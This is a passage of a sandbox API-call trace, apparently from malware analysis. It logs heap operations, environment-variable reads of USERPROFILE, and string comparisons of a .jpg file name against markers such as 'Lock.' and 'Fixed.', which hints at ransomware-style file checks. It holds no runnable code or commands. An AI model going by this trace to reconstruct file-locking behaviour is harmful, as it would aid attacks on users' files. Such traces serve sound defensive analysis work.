xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0195.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.155] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0195.155] TranslateMessage (lpMsg=0x8bf970) returned 0 [0195.155] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0195.155] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0195.155] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0195.155] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0195.155] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.155] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0195.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0195.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AX5eJBJ82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.155] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5eJBJ82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5eJBJ82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJBJ82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBJ82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BJ82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="82y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.156] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0195.156] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0195.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0195.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0195.157] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AX5eJBJ82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5eJBJ82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5eJBJ82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eJBJ82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBJ82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BJ82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="82y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.158] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y3.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0195.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0195.159] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0195.159] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0195.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0195.160] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0195.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.160] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0195.163] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0195.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.163] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0195.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0195.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0195.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 